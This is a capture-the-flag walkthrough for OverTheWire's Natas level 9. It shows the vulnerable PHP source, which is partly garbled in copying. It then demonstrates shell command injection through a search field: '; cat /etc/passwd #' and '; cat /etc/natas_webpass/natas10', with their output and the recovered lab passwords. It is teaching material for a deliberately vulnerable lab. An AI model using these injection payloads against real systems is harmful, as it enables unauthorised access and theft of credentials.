Natas - Level 10

Connection information

  • Username: natas9
  • Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
  • URL: http://natas9.natas.labs.overthewire.org

Information given

The white box is composed of three parts:

  1. The first part is an input box with the label Find words containing:
  2. The second is a button named Search
  3. The last is a link View sourcecode pointing to http://natas9.natas.labs.overthewire.org/index-source.html

Getting the password

Here is the interesting part of the server source code:

Find words containing: <input name=needle><input type=submit name=submit value=Search><
, br><br>
</form>
Output:
<pre>
<?
$key = ””;
if(array key exists(needle, $ REQUEST)) {
$key = $ REQUEST[needle];
}
if($key != ””) {
passthru(grep i $key dictionary.txt);
}
?>
22</pre>

We can take a look at the file dictionary.txt stored here http://natas9.natas.labs.overthewire.org/dictionary.txt.

It is just a number of words in alphabetic order. Now what’s interesting is that we can do some injection. If we submit ; echo we will see the output

dictionary.txt!

Poking with injections

Using ; cat /etc/passwd #

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
natas31:x:30031:30031:natas level 31:/home/natas31:/bin/bash
natas32:x:30032:30032:natas level 32:/home/natas32:/bin/bash
natas33:x:30033:30033:natas level 33:/home/natas33:/bin/bash
natas17:x:30017:30017:natas level 17:/home/natas17:/bin/bash

Use ; cat index.php # to see some page inception (and rediscover the password for natas9).

Password

Remember in level 8, we had a hint:

<!−− hint: password for webuser natas8 is in /etc/natas webpass/natas8 −−>

If we try to display /etc/natas webpass/natas10, we get the password nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

; cat /etc/natas webpass/natas10